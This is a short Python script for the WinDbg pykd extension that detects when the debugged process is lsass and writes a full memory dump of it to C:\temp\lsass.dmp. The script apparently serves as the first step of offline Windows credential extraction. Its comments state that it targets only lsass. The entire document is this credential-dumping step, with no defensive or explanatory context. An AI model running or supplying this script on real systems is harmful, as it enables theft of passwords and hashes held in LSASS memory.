1. from pykd import *
2. #Dirty way to get processname
3. #getProcessExeName doesnt works for me
4. pname  = dbgCommand("!process").split("\n")[3]
5. #we only target lsass
6. if "lsass" in pname:
7.     #you can use .writemem too
8.     pname = dbgCommand(".dump /f /o /u C:\\temp\\lsass.dmp")
9.     dprint "lsass saved"